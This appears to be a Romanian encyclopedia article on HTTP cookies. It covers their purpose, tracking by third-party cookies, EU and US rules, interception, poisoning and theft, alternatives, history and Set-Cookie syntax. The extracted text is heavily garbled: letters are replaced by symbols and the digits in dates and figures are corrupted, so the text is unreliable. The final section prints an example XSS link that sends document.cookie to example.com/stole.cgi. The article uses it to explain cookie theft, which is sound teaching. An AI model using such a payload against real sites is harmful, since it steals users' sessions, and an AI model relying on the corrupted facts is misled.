Cookie-urile sunt folosite de serverele web pentru a putea diferenia utilizatorii i pentru

a putea reaciona n funcie de aciunile acestora. Ele au fost inventate pentru a se putea
implementa un co de cumprturi virtual: utilizatorul navigeaz sit-ul i poate aduga
sau elimina n voie obiectele din co.
!utentificarea utilizatorilor fa de server este o alt aplicaie a cookie-urilor" acestea
rein faptul c utilizatorul este de#a autentificat i serverul i va permite aciuni care sunt
rezervate doar celor nregistrai.
$nele sit-uri folosesc cookie-urile i pentru a permite utilizatorilor s modifice felul n
care arat paginile de web% n funcie de preferinele personale% i pentru a reine aceste
preferine ntre sesiuni. &e pot modifica i reine n acest fel at't aspecte legate de
funcionalitatea c't i de aspectul grafic al paginilor. (e e)emplu% *ikipedia permite
utilizatorilor nregistrai s modifice aspectul paginilor% iar n +oogle% ciar i utlizatorii
nenregistrai pot alege c'te rezultate s fie afiate ntr-o pagin.
Cookie-urile se folosesc i pentru a urmri activitatea unui utilizator pe un site% sau ciar
pe mai multe site-uri% n cazul cookie-urilor ,tird-part-. sau a aa-numiilor ,web-bugs..
$rmrirea n cadrul unui site este fcut n scopul obinerii unor statistici ale folosirii.
Companiile de publicitate urmresc activitatea utilizatorilor n cadrul mai multor site-uri
pentru a face statistici din care s rezulte interesele lor% put'nd astfel s decid ce reclame
s afieze la un anumit moment% unui anumit utilizator.
/ealizarea
Cookie-urile nu sunt dec't nite fragmente de date fr semnificaie pentru utilizator sau
pentru browserul su% dar care pot fi interpretate de server. 0rowserul le primete si le
returneaz serverului nemodificate% introduc'nd astfel o ,amintire. a evenimetelor trecute
n cererea 1223% care n sine este atemporal 4fr cookie-uri% fiecare cerere este un
eveniment izolat% fr a avea n principiu vreo legtur cu alte cereri trecute sau viitoare%
ctre acelai server5. /eturn'nd un cookie unui server% acesta poate face legtura cu cereri
precedente 4n care acelai server a trimis cookie-ul5. 6n afar de servere% cookie-urile mai
pot fi create de un script scris ntr-un limba# cum ar fi #ava% dac acest lucru e permis de
browser.
(escrierea detaliat a mecanismului7897:9 sugereaz ca browserele s poat reine cel
puin ;<< de cookie-uri de c'te = kb% i cel puin :< pentru fiecare server sau domeniu de
internet.
>a crearea cookie-ului se poate specifica i data de teregere" n caz contrar% acesta va fi
ters la inciderea browserului. $n magazin virtual poate dori s se rein coninutul
coului de cumprturi ntre sesiuni% astfel nc't la urmtoarea vizit utilizatorul s nu
trebuiasc s caute din nou toate produsele. 6n acest caz% vor crea un cookie cu un termen
de tergere ceva mai ndeprtat de momentul curent. (oar cookie-urile care au un termen
de tergere specificat vor ,supravieui. deci ntre sesiuni - acestea pot fi numite
,persistente..
?eadevruri
(e la apariia lor pe internet% s-au rsp'ndit mai multe preri greite despre cookie-uri.7;9
7=9 6n :<<@% Aupiter /esearc a publicat rezultatele unui sonda#%7@9 conform cruia o bun
parte a celor cestionai credeau c:
Cookie-urile sunt similare viermilor sau viruilor% adic pot s tearg date de pe ard
disk"
Cookie-urile sunt o form de sp-ware% adic pot s citeasc informaii personale stocate
n 3C"
Cookie-urile genereaz popup-uri 4ferestre cu reclame descise automat de browser% n
general suprtoare pentru utilizator5"
Cookie-urile sunt folosite pentru a trimite spam"
Cookie-urile sunt o form de reclam.
(e fapt cookie-urile sunt doar date% nu cod: ele nu pot s tearg sau s citeasc ceva de
pe 3C-ul utilizatorului.7B9 2otui% cookie-urile permit detectarea paginilor vizitate de un
utilizator ntr-unul sau mai multe site-uri. !ceste informaii pot fi colectate ntr-un profil
al utilizatorului. !cesta este anonim 4nu conine informaii personale cum ar fi nume sau
adres% dar conine totui un C35% cu e)cepia cazului n care utilizatorul nsui i-a dat
datele personale. Ciar dac sunt anonime% datele colectate n acest fel au dat natere unor
ngri#orri n legtur cu intimitatea de care se poate beneficia navig'nd pe internet.
Conform aceluiai sonda#% destul de muli intervievai nu tiau cum s tearg cookie-
urile reinute de browserele lor.
Configurarea browserului
Cele mai multe browsere moderne suport cookie-uri" ele permit ns utilizatorului s
decid dac va folosi sau nu cookie-uri. Dariantele cele mai folosite sunt:7E9 485 nu sunt
folosite cookie-uri% 4:5 browserul cere permisiunea utilizatorului la fiecare cookie% sau 4;5
toate cookie-urile sunt acceptate.
Fereastra de configurare a cookie-urilor din Gozilla Firefo)% afi'nd cookie-urile n
funcie de domeniul de provenien.
0rowserul poate permite specificarea mai detaliat a cookie-urilor care s fie acceptate.
(e obicei utilizatorul are la dispoziie urmtoarele opiuni: respingerea cookie-urilor
pentru anumite domeniii de internet" respingerea cookie-urilor tird part- 4e)plicate mai
#os5" acceptarea cookie-urilor dar tergerea lor la nciderea browserului" permisiunea ca
un server s creeze cookie-uri pentru un alt domeniu. Cele mai multe browsere care
suport Aavascript dau posibilitatea afirii cookie-urilo active pentru o anumit pagin%
scriind #avascript:alert4HCookies: HIdocument.cookie5 n c'mpul de editare a $/>-ului.
6n plus% unele browsere permit utilizatorului s vad i s tearg individual cookie-urile
stocate.
&tandardul 3;3 d posibilitatea serverelor s declare ce fel de informaii colecteaz i n
ce scop% incluz'nd informaiile colectate cu a#utorul cookie-urilor. !stfel% un browser
poate s decid dac accept sau nu cookie-urile% sau poate afia utilizatorului inteniile
declarate de server% iar acesta va decide acceptarea sau respingerea cookie-urilor.
!nonimitatea i cookie-urile ,tird part-.
Cookie-urile au implicaii destul de importante n ceea ce privete anonimitatea i
securitatea informaiilor de natur personal ale celor care acceseaz pagini de web. (ei
cookie-urile sunt trimise doar serverului care le-a creat sau unuia care este n acelai
domeniu de Cnternet% o pagin poate conine imagini 4sau alte elemente5 gzduite pe mai
multe servere din domenii diferite. Cookie-urile create de aceste servere secundare 4fa
de serverul pe care este gzduit pagina propriu-zis se numesc ,tird part-. n limba
englez% o traducere mot-a-mot fiind ,ter parte..
6n acest e)emplu 4fictiv5% o companie de publicitate are bannere pe dou pagini de web.
Cmaginile sunt memorate pe serverele companiei" n acest fel% folosind cookie-uri tird
part-% compania de publicitate poate urmri activitatea utilizatorilor pe cele dou pagini.
Companiile publicitare folosesc astfel de cookie-uri pentru a urmri utilizatorii care
acceseaz paginile n care aceasta are imagini sau aa numite ,*eb-bugs. 4care sunt
imagini cu dimensiunea de un singur pi)el% n mod normal invizibile -transparente-% al
cror singur rol const n a declana un transfer de cookie-uri5. 6n acest fel compania
cunoate comportamentul utilizatorilor i poate plasa reclame pertinente 4apropiate de
preocuprile i interesele utilizatorului5 n anumite pagini.
3osibilitatea generrii unei apro)imri a comportamentului utilizatorilor a fost
considerat de unii drept o ameninare a anonimitii% mai ales atunci cnd aceasta se face
prin urmrirea aciunilor pe mai multe domenii de Cnternet% folosind cookie-uri ,tird
part-.. din aceast cauz% folosirea cookie-urilor este reglementat prin lege n unele ri.
+uvernul &tatelor $nite ale !mericii a elaborat un set strict de reguli n privina cookie-
urilor n anul :<<<% dup ce a ieit la iveal faptul c (irecia pentru Controlul (rogurilor
a Casei !lbe folosea cookie-uri pentru a vedea dac cei care i accesau site-ul accesau
dup aceea pagini de web despre folosirea ori producerea drogurilor. 6n :<<:% (aniel
0randt% militant pentru securitatea datelor personale pe web% a descoperit c i pagina de
web a CC! lsa pe ard-disk-urile utilizatorilor cookie-uri persistente 4cu data de e)pirare
:<8<5. (up ce a fost anunat c i ncalc propriile reguli% CC! a rspuns c trimiterea
cookie-urilor a fost accidental% c ele nu au fost folosite efectiv pentru a urmri
utilizatorii i i-a modificat pagina astfel nc't s nu mai foloseasc cookie-uri.7J9 3e :@
decembrie :<<@% 0randt a descoperit c i ?&! lsa dou cookie-uri persistente pe
calculatoarele utilizatorilor% din cauza unui update de software. (up ce a fost informat
de acest lucru% ?&! a dezactivat trimiterea de cookie-uri de pe site-ul propriu.7K9
L directiv din :<<: a $niunii Europene n privina securitii informaiilor de natur
personal pe Cnternet conine reguli relativ la folosirea cookie-urilor. 3rintre altele%
!rticolul @% !lineatul ; specific faptul c salvarea datelor 4cum ar fi cookie-uri5 pe
calculatorul unui utilizator poate fi fcut doar dac: 85 utilizatorului i se spune cum vor
fi utilizate aceste date" i :5 utilizatorului i se d posibilitatea de a refuza aceste date.
2otui% acelai articol menioneaz faptul c salvarea datelor necesare din motive tenice
este e)ceptat de la aceast regul. !ceast directiv trebuia aplicat nc din octombrie
:<<;% dar un raport din decembrie :<<= 78<9 spune 4la pagina ;J5 c aceast prevedere nu
a fost pus n practic% i c unele ri membre nici mcar nu au adoptat-o 4&lovacia%
>etonia% +recia% 0elgia% i >u)embourg5. !celai raport propune o analiz serioas a
situaiei din statele membre 4ale $niunii Europene5.
(ezavanta#e ale cookie-urilor
6n afar de problema securitii datelor personale% mai e)ist c'teva motive pentru care
folosirea cookie-urilor este criticat: ele nu pot identifica foarte precis utilizatorii% i pot fi
folosite pentru a ataca sistemele C2.
Cdentificarea imprecis
(ac pe un calculator sunt folosite mai multe browsere% fiecare va avea cookie-urile sale.
(eci cookie-urile nu identific persoana% ci combinaia cont de utilizator% calculator%
browser. Lricine folosete mai multe conturi de utilizator% calculatoare sau browsere% va
avea mai multe seturi de cookie-uri.
(e asemenea% prin cookie-uri nu se poate face diferena dintre doi utilizatori care folosesc
acelai calculator i browser 4dac nu folosesc conturi de utilizator diferite5.
Cnterceptarea cookie-urilor
6n mod normal% cookie-urile sunt transferate ntre un sever 4sau mai multe servere din
acelai domeniu5 i calculatorul utilizatorului. (eoarece cookie-urile pot conine
informaii confideniale 4nume de utilizator% parol etc.5% ele nu ar trebui s fie accesibile
altor calculatoare. (in pcate% sesiunile 1223 obinuite sunt vizibile tuturor
calculatoarelor din reea% care pot intercepta pacetele de date. !ceste cookie-uri nu pot
conine deci informaii confideniale. L soluie posibil este 1223&% care folosete
2ransport >a-er &ecurit- pentru a cripta toate datele scimbate ntre server i calculatorul
utilizatorului.
!a numitul ,cross-site scripting. 4scripting inter-sit5 permite trimiterea unui cookie altor
servere% care nu ar trebui n mod normal s-l primeasc. 0rowser-ele moderne permit
e)ecutarea 4de ctre client5 a unor fragmente de cod primite de la server" dac cookie-
urile pot fi accesate n timpul e)ecuiei% ele ar putea fi trimise altor servere dec't cele
,autorizate.. !ceasta se numete ,furtul. cookie-ului% iar criptarea nu a#ut mpotriva
acestui gen de atac.7889
!ceas metod este de obicei folosit pe sit-uri care permit utilizatorilor s trimit
coninut 12G>. Folosind un anumit fragment de cod% un utilizator ru-voitor poate s
primeasc cookie-uri ale altor utilizatori" cu a#utorul lor% el poate apoi s se conecteze i
s se pcleasc serverul% care crede c altcineva s-a autentificat.
,Ltrvirea. cookie-urilor
,Ltrvirea. cookie-urilor: un atacator trimite unui server un cookie invalid 4de e)emplu
un cookie primit de la server% dar modificat5.
Cookie-urile ar trebui s fie reinute i trimise serverului nescimbate" un atacator ar
putea ns s le modifice i apoi s le trimit serverului. !cest proces se numete
,otrvirea. cookie-urilor% i este uneori folosit dup ,furtul. lor. (ac% de e)emplu% un
cookie reine suma care trebuie pltit pentru cumprturile din coul virtual% scimbarea
acestei valori ar putea permite cumprarea unor bunuri la un pre mult mai mic.
2otui% cele mai multe site-uri rein cu a#utorul cookie-urilor doar un identificator de
sesiune: acesta este un numr unic4generat aleator5 care identific sesiunea utilizatorului -
el reprezint de fapt un inde) ntr-o tabel intern a serverului% n care se rein valorile cu
adevrat importante% cum ar fi preul unor cumprturi% .a.m.d.. 6n acest fel problema
cookie-urilor invalide este n principiu eliminat.
Cookie inter-site
Furtul de cookie-uri: un cookie care ar trebui s fie comunicat serverului e trimis de client
unui alt calculator.
Fiecare site ar trebui s aib acces doar la cookie-urile proprii% adic un site de genul
ru.net nu ar trebui s poat citi cookie-uri trimise clientului de un alt site bun.net. 2otui%
erori n programarea browser-elor pot duce la nclcarea acestei reguli. &e a#unge la o
situaie similar trimiterii de cookie-uri modificate% dar n acest caz nu este atacat
serverul% ci un utilizator de buncredin care folosete un browser vulnerabil. 6n acest
fel% de e)emplu% se poate fura acel identificator de sesiune i atacatorul poate s se
,autentifice. n locul utilizatorului de bun credin.
!lternative la cookie-uri
E)ist o serie de alternative la folosirea cookie-urilor. !cestea au ns i ele dezavanta#ele
lor% de aceea cookie-urile sunt preferate de cele mai multe ori n practic. Cele mai multe
dintre aceste metode alternative permit urmrirea aciunulior utilizatorilor% dei cu o
acuratee mai mic dec't cea a cookie-urilor. &ecuritatea informaiilor personale rm'ne
deci o problem% ciar daca browser-ul este configurat s nu accepte cookie-uri.
!dresa C3
L metod foarte puin precis de urmrire a utilizatorilor se bazeaz pe reinerea
adreselor C3 ale calculatoarelor care solicit pagini web. !ceasta a fost disponibil i
folosit nc de la nceputurile *orld *ide *eb-ului% pentru c trimiterea paginii ctre
un client presupune cunoaterea adresei C3 a acestuia 4sau a pro)--ului% dac se folosete
unul5. !ceast adres poate fi reinut de ctre server indiferent dac cookie-urile sunt
sau nu folosite.
2otui% calculatoarele i pro)--urile pot fi folosite de mai muli utilizatori" de asemenea%
acelai calculator poate avea adrese C3 diferite% de e)emplu n cazul unor cone)iuni
succesive prin dial-up. (e aceea% o urmrire fiabil a unui utilizator este dificil" o
proprietate a protocolului 1223 poate a#uta n acest sens: atunci c'nd un browser cere o
pagin din cauz c utilizatorul urmeaz o legtur% cererea conine i adresa paginii pe
care se afl aceast legtur. (ac serverul stoceaz aceste adrese% el poate avea
succesiunea de pagini vizitate de utilizator. ?ici aceast metod nu este la fel de eficient
ca folosirea cookie-urilor% deoarece mai muli utilizatori pot accesa aceeai pagin de la
acelai calculator% ?!2 router% sau pro)- i apoi s urmeze dou legturi diferite. 6n orice
caz% n acest fel se pot doar urmri aciunile utilizatorului% i nu se pot suplini celelalte
moduri de folosire a cookie-urilor.
$rmrirea cu a#utorul adresei C3 poate fi imposibil dac utilizatorul folosete unul dintre
sistemele de acces anonim la internet% cum ar fi 2or. !cestea fac ca un browser s aib
mai multe adrese C3 n cadrul unei singure sesiuni% i ciar pot face s par c de la
aceeai adres C3 vin mai muli utilizatori.
$/> 4Muer- string5
L metod mai precis se bazeaz pe introducerea infromaiei n adresa $/>. 3artea
denumit ,Muer- string. este folosit de obicei% dar se pot folosi i alte seciuni.
Gecanismul sesiunilor 313 folosete aceast metod dac cookie-urile nu sunt activate.
6n principiu metoda const n adugarea la adresele $/> ale legturilor 4de pe paginile
gzduite5 a unui ir de caractere 4informaia care altfel ar fi fost reinut ntr-un cookie5.
!tunci c'nd este urmat una dintre legturi% browser-ul returneaz ntregul $/> 4deci i
partea ataat serverului. (iferena fa de mecanismul cookie-urilor este urmtoarea:
dac $/>-ul este refolosit 4de e)emplu trimis prin email sau reinut n browser5% aceeai
informaie este primit de server" de e)emplu urm'nd un $/> primit prin email%
utilizatorul va fi nt'mpinat de preferinele ori coul de cumprturi iniial 4al celui care i-
a trimis email-ul5. Gai mult% dac acelai utilizator descide aceeai pagin de dou ori%
dar ,venind. din pagini diferite 4de e)emplu dintr-un motor de cutare i dintr-o alt
pagin a aceluiai domeniu5% el va vedea lucruri diferite.
$n alt dezavanta# al acestei metode este legat de securitate: trimi'nd o adres prin email%
este posibil s fie trimis i un identificator de sesiune% iar cel care va urma legtura va
aprea pentru server ca fiind un utilizator autentificat. 6n aceast privin cookie-urile
sunt mult mai sigure% fiind mai greu de ,furat..
!utentificare 1223
3rotocolul 1223 include mecanisme 4cum ar fi digest access autentication5% care permit
accesarea unei pagini *eb doar dup furnizarea unui nume de utilizator i a unei parole%
pe care browser-ul le reine i le transmite server-ului la fiecare cerere% fr ca utilizatorul
s le introduc de fiecare dat" din punctul acestuia de vedere% lucrurile se desfoar ca
i n cazul folosirii cookie-urilor. 2otui% transmiterea parolei 4i ciar a numelui de
utilizator5 de fiecare dat c'nd este cerut o pagin este destul de nesigur: acest trafic
poate fi interceptat. Cdentificatorul de sesiune 4informaia care putea fi interceptat dacse
foloseau cookie-uri5 e)pir destul de repede dup ce nu a fost folosit% devenind
inutilizabil pentru un atacator.
Lbiecte >ocale Gacromedia Flas
(ac un browser folosete plugin-ul Gacromedia Flas 3la-er funcia de salvare local a
unor obiecte poate fi folosit ntr-un mod foarte asemntor cookie-urilor. !ceasta poate
fi o opiune atrgtoare pentru dezvoltatorii de pagini *eb% pentru c ma#oritatea
utilizatorilor de *indows folosesc acest plugin% iar limita de mrime este de 8<< kb. 6n
plus% configurrile sunt separate de cookie-uri% deci stocarea local a obiectelor poate fi
activat% iar cookie-urile dezactivate.
7modific9
!lte metode de a stoca date local
$nele browsere suport un mecanism prin care paginile *eb i pot stoca local unele date
printr-un script. Cnternet E)plorer% de e)emplu% poate fi folosit pentru a stoca date ntr-o
pagin *eb salvat pe ard-disk% ntr-un document NG>% sau n seciunile ,Favorites.
4,3agini favorite. ori ,&emne de carte. ori ,1istor-. 4,3agini recente. ale browser-
ului.78:9
window.name
(ac Aavascript este activat% proprietatea name name a obiectului window poate fi
folosit pentru a stoca local date% deoarece aceasta rm'ne nescimbat la ncrcarea
succesiv a unor pagini *eb. Getoda este mai puin cunoscut% i din aceast cauz nu
este considerat drept o ameninare la adresa securitii.78;9
Cstoria cookie-urilor
2ermenul vine de la e)presia din limba englez Hmagic cookieH% care desemneaz un
pacet de date pe care un program l primete doar pentru a-l trimite napoi nemodificat.
!ceast procedeu era de#a larg rsp'ndit atunci c'nd% n iunie 8KK=% >ou Gontulli a avut
ideea de a-l folosi n cadrul comunicaiilor web78=9. 3e atunci el era anga#at al ?etscape
Communications% care dezvolta o aplicaie e-commerce pentru un client% iar cookie-urile
au fost folosite pentru a implementa un ,co de cumprturi virtual.78@978B9
6mpreun cu Aon +iannandrea% Gontulli a scris descrierea tenic a cookie-urilor% iar
versiunea <.K a browser-ului ?etscape 4lansat n septembrie 8KK=5 accepta cookie-uri.
3rima aplicaie a cookie-urilor a fost pe situl ?etscape - se verifica dac un vizitator intra
accesa pentru prima dat situl. Gontulli i +iannandrea au depus o cerere de brevetare a
mecanismului 48KK@5% primind brevetul n 8KKJ. Dersiunea : a Cnternet E)plorer 4lansat
n 8KK@5 suporta de asemenea cookoie-uri.78E9
>a acel moment% introducerea cookie-urilor nu era foarte cunoscut de publicul larg.
Cookie-urile erau acceptate de setrile implicite ale browserului% iar utilizatorii nu erau
notificai de prezena lor. $n articol Financial 2imes% publicat n8: februarie 8KKB% a atras
atenia asupra cookie-urilor% mai ales din cauza posibilitii de a sustrage cu a#utorul lor
informaii personale.
3rimele specificaii oficiale au fost scrise n februarie 8KKE% de CE2F 4documentul /FC
:8<K5. Cookie-urile ,tird-part-. au fost identificate ca fiind o ameninare la adresa
anonimitii utilizatorilor% astfel nc't documnetul recomand ca ele s nu fie acceptate
deloc% sau mcar ca aceasta s fie setarea implicit a browser-ului.
Companiile de publicitate de#a foloseau cookie-uri% iar recomandarea privind cookie-uri
,tird-part-. nu au fost respectate de ?etscape ori de Cnternet E)plorer. /FC :8<K a fost
urmat de /FC :KB@ n octombrie :<<<.
Cmplementarea
Crearea unui cookie
3aginile web sunt transmise prin 1223" browser-ul ncepe prin a trimite o cerere
serverului. (e e)emplu% pentru a accesa pagina ttp:OOwww.w;.orgOinde).tml% browser-
ul se conecteaz la serveul www.w;.org i trimite o cerere de forma:
+E2 Oinde).tml 1223O8.8
browser P server
&erverul rspunde trimi'nd pagina cerut% precedat de un pacet de te)t numit ,1223
eader.. !cesta poate conine linii care cer browser-ului s rein cookie-uri:
1223O8.8 :<< LQ
&et-Cookie: nameRvalue
Content-t-pe: te)tOtml
4content of page5
browser S server
>inia &et-cookie este trimis doar dac serverul vrea ca browser-ul s rein un cookie.
Gai precis% cookie-ul este nameRvalue. (ac browser-ul accept cookie-uri% toate cererile
urmtoare ctre acelai server vor conine acel cookie. (e e)emplu% dac browser-ul vrea
s acceseze ttp:OOwww.w;.orgOspec.tml va trimite serverului www.w;.org o cerere de
forma:
+E2 Ospec.tml 1223O8.8
Cookie: nameRvalue
!ccept: TOT

browser P server
6n acest fel serverul tie c aceasta nu e prima cerere% i va rspunde trimi'nd pagina
cerut% eventual mpreun cu alte cookie-uri. Daloarea unui cookiepoate fi modificat de
server trimi'nd linia &et-Cookie: nameRnewvalue n rspunsul urmtoarei cereri a
browser-ului.
6n general% linia &et-Cookie nu e creat de serverul propriu-zis% ci de un program C+C.
&erverul doar trimite rezultatul geneart de acest program browser-ului.
Cookie-urile pot fi create i de scripturi 4de e)emplu Aava&cript5 care ruleaz n cadrul
browser-ului. 6n Aava&cript% se folosete obiectul document.cookie. (e e)emplu%
instruciunea document.cookie R HtemperatureR:<H creeaz un cookie cu numele
temperature i valoarea :<.78J9
!lte proprieti ale cookie-urilor
6n afar de nume i valoare% un cookie poate s conin data epirrii% o cale% un nume de
domeniu 4domain name5% i dac cookie-ul trebuie sau nu s fie transmis doar prin
cone)iune criptat 42ransport >a-er &ecurit-5. /FC :8<K prevede folosirea unui numr
cares rein versiunea cookie-ului% dar acesta e de obicei omis. !ceste proprieti
urmeaz dup nameRnewvalue i sunt de obicei separate prin ,".. (e e)emplu% un cookie
poate fi creat de server trimi'nd linia &et-Cookie: nameRnewvalue" e)piresRdate" patRO"
domainR.e)ample.org.
E)emplul unui rspuns 1223 de la +oogle% care creeaz un cookie i proprietile lui.
?umele de domeniu i calea spun browser-ului crui server s trimit cookie-ul atunci
c'nd ncearc s acceseze o pagin. (ac nu sunt specificate% valoarea implicit este
domeniul i calea obiectului din cererea curent. Ca urmare% sirurile domeniu i cale pot
s duc la trimiterea unui cookie la alt server dec't cel implicit. (in motive de securitate%
cookie-ul este acceptat doar dacserverul este membru al domeniului specificat n
proprietile cookie-ului.
Cookie-urile sunt de fapt identificate de tripleta numeOdomeniuOcale% nu doar de nume 46n
varainta original ?etscape aprea doar perecea numeOcale5. Cu alte cuvinte% acelai
nume dar domenii diferite reprezint cookie-uri diferite 4probabil cu valori diferite5.
(ata e)pirrii specific momentul n care browser-ul va terge cookie-ul din memorie. 6n
mod implicit 4dac nu se specific o dat a e)pirrii5% cookie-urile sunt terse la
nciderea sesiunii 4oprirea programului5% dar dac este specificat o anumit dat%
cookie-ul va rm'ne n memorie4p'n la acea dat . 6n acest fel% specific'nd o dat a
e)pirrii% cookie-urile ,supravieuiesc. ntre sesiuni" aceast prprietate se numete
,persisten.
(e e)emplu% un server ar putea s trimit un cookie de forma urmtoare:
&et-Cookie: /GC(RE;:=:;sdfsE;:=:" e)piresRFri% ;8-(ec-:<8< :;:@K:@K +G2" patRO"
domainR.e)ample.net
?umele acestui cookie este /GC(% iar valoarea sa E;:=:;sdfsE;:=:. Calea i numele de
domeniu O and .e)ample.net spun browser-ului s trimit cookie-ul atunci c'nd cere o
pagin 4orice pagin din domeniu .e)ample.net.
(ata e)pirrii este ;8 decembrie :<8<% ora :;:@K:@K +G2. Lrice cerere dup acea dat
nu va mai fi nsoit de acest cookie% care va fi ters. Cookie-urile mai pot fi terse de
server 4trimi'nd o cerere de modificare i scimb'nd data de e)pirare undeva n trecut5
sau de utilizator% din meniul browser-ului.
!utentificarea
Cookie-urile pot fi folosite de servere pentru a recunoate utilizatorii autentificai i
pentru a modifica paginile trimise n funcie de preferinele acestore 4personalizare5. (e
e)emplu:
$tilizatorul introduce numele de utilizator i parola n c'mpurile de editare ale unei
pagini i le trimite spre serverului"
&erverul primete numele de utilizator i parola i le verfific" dac sunt corecte% trimite o
pagin care confirm acest lucru utilizatorului% mpreun cu un cookie" de asemenea%
serverul memoreaz perecea numeOcookie 4sau doar cookie-ul5"
>a fiecare accesare a unei pagini de pe acel server% browser-ul trimite i cookie-ul
mpreun cu cererea" serverul compar cookie-ul primit cu cele memorate% i poate s
decid dac este vorba de un utilizator autentificat sau nu% trimi'nd pagina potrivit.
!ceasta este metoda folosit de aproape toate siturile% inclusiv *ikipedia.
7modific9
3ersonalizarea paginilor
6n mod similar autentificrii% serverul afl ce utilizator i cere o pagini poate s o trimit
n consecin% n funcie de preferinele e)primate anterior% i care au fost reinute de
server. &e pot personaliza pagini ciar n cazul utilizatorilor care nu au un cont pe server:
pur i simplu se rein preferinele n cadrul cookie-ului% i la cererile urmtoare% trimi'nd
i cookie-ul% browser-ul trimite i preferinele utilizatorului.
(e e)emplu% +oogle reine preferinele utilizatorilor ntr-un cookie numit 3/EF. !cesta e
creat cu valori implicite la prima accesare a sitului. !tunci c'nd utilizatorul intr n
pagina de preferine i alege ceva% serverul trimite o cerere de modificare a cookie-ului%
rein'nd n el noua valoare.
$rmrirea utilizatorilor
Getoda cea mai folosit este urmtoarea:
(ac o cerere nu conine nici un cookie% se presupune c este prima accesare a unei
pagini de pe acel server" acesta creeaz un cookie cu o valoare arbitrar 4dar unic i-l
trimite% mpreun cu pagina solicitat"
(e acum ncolo% browserul va primi mpreun cu cererile i cookie-ul" el va trimite
paginile cerute% dar va reine numele paginii cerute% data i ora% precum i valoarea
cookie-ului ntr-o list special.
3arcurg'nd aceast list% este posibil s se afle ce pagini 4i n ce ordine5 au fost vizitate
de un anumit utilizator 4identificat de un anumit cookie5.
Cookie-uri ,tird-part-.
Cmaginile sau alte obiecte coninute de o pagin web pot s fie de fapt pe alt server dec't
cel pe care este pagina propriu-zis. 3entru a afia aceste obiecte% browser-ul le descarc
de pe serverele lor% eventual primind i cookie-uri. !cestea se numesc ,tird part-.% dac
serverul care le-a creat se afl n alt domeniu dec't serverul paginii.
!cest fenomen se nt'mpl mai ales n cazul reclamelor. Cmaginile publicitare se afl de
obicei stocate pe serverele companiei publicitare% n alt domeniu dec't pagina web pe
care sunt afiate. (ac browser-ul accept cookie-urile% compania de publicitate poate s
urmreasc activitatea utilizatorului pe mai multe situri 4pe toate siturile vizitate% care au
imagini ce provin de la acea companie de publicitate5. !ceasta se face folosind un $/>
unic pentru fiecare sit 4astfel nc't aceeai imagine afiat pe dou situri are alt $/>5 sau
cu a#utorul c'mpului referer din tranzacia 1223. !celai lucru se poate obine
intercal'nd n pagina de web imagini invizibile utilizatorului% dar care sunt downloadate
de browser.
Companiile de publicitate au negat permanent c aceste informaii ar fi folosite i pentru
alte scopuri n afara stabilirii unor preferine ale utilizatorilor.
Gulte browsere moderne% cum ar fi Cnternet E)plorer% Lpera sau Gozilla Firefo)% permit
utilizatorului s aleag blocarea cookie-urilor ,tird part-.. Dersiunea B a Cnternet
E)plorer permite i o form intermediar de blocare: dac tird.com trimite un cookie
odat cu o imagine de pe o pagin din domeniul first.com% cookie-ul nu este trimis n
cazul n care o este nevoie de o imagine de pe acelai tird.com% dar pentru un document
din domeniul oter.com" dac ns un document oarecare din domeniul iniial first.com
are nevoie de o imagine de pe tird.com% cookie-ul va fi trimis78K9.
Coul de cumprturi virtual
!ceasta este o alt aplicaie a cookie-urilor% discutat i mai sus
,Furtul. cookie-urilor
(ei n principiu cookie-urile sunt trimise doar serverelor care le-au creat% e)ist metode
de a le ,fura.% adic de a convinge browser-ul s le trimit altor servere.
3rintre altele% scripturile Aava&cript sau A&cript au de obicei acces la toate cookie-urile
stocate de browser% put'nd s le trimit oriunde. !ceasta% mpreun cu situri care permit
utilizatorilor s le modifice paginile scriind coninut 12G> duce la situaii nedorite.
(e e)emplu% cineva care deine domeniul e)ample.com poate scrie pe un alt sit o legtur
de forma urmtoare:
Ua refRHVH onclickRHwindow.locationRWttp:OOe)ample.comOstole.cgiX
te)tRWIescape4document.cookie5" return false"HYClick ereZUOaY
C'nd un utilizator apas pe aceast legtur% browserul nlocuieste document.cookie cu
lista cookie-urilor active pe acel sit% care a#ung astfel la serverul e)ample.com% al crui
deintor are acces acum la cookie-urile utilizatorilor sitului pe care a pus legtura
!cest gen de atac este imposibil de prevenit de ctre browser% pentru c scriptul vine
ciar serverul care a creat cookie-urile% i totul pare a fi autorizat de acel server. &ingura
soluie este ca administratorii siturilo care permit utilizatorilor s le modifice coninutul
s implementeze metode pentru respingerea acestui gen de scripturi.